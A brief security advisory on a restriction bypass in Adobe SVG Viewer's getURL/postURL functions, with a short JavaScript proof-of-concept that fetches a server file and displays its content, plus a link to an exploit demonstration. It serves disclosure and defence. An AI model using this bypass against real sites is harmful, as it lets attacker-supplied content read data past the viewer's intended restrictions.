Adobe SVG Viewer postURL/getURL Restriction Bypass Vulnerability

Adobe SVG Viewer postURL/getURL Restriction Bypass Vulnerability

The following example was provided:

getURL(
"rd.asp",
function (oResponse) {
parent.alert(oResponse.content);
}
);

An exploit demonstration is available on the following web page:

http://sec.greymagic.com/adv/gm003-mc/